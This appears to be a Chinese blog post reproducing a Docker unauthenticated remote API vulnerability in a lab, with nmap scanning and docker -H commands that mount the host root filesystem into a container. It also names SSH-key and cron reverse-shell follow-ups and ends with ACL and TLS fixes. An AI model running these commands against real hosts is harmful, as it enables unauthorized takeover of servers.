Docker未授权访问漏洞

信息收集

1
nmap -sV -p- -T4 10.1.1.200

image-20240201220623616

2375 就是docker 的远程操控端口

如果访问2375端口出现下面这样就是存在漏洞

image-20240201220807954

通过/info目录得到docker 信息

image-20240201221113830

漏洞利用

1
docker -H tcp:L//10.1.1.200 ps -a

image-20240201221221484

启动一个容器

1
docker -H tcp://10.1.1.200 start 3dc8d67b679d 

image-20240201221505633

进入一个容器

image-20240201221714944

创建一个busybox容器,但后将宿主的磁盘挂载到容器当中

1
docker -H tcp://10.1.1.200:2375 run -it -v /:/mnt busybox chroot /mnt sh
  1. docker未授权写ssh公钥获得shell
  2. 写定时任务反弹shell

修复建议

修复建议

  1. 设置ACL,只允许信任ip连接对应端口

    docker部署rocketmq 4.9.7 并开启ACL 和 dashboard 账号密码_使用docker-compose安装rocketmq4.9.7-CSDN博客

  2. 开启TLS,使用生成的证书进行认证:
    https://docs.docker.com/engine/security/protect-access/


Docker未授权访问漏洞
https://tsy244.github.io/2024/02/01/漏洞复现/Docker未授权访问漏洞/
Author
August Rosenberg
Posted on
February 1, 2024
Licensed under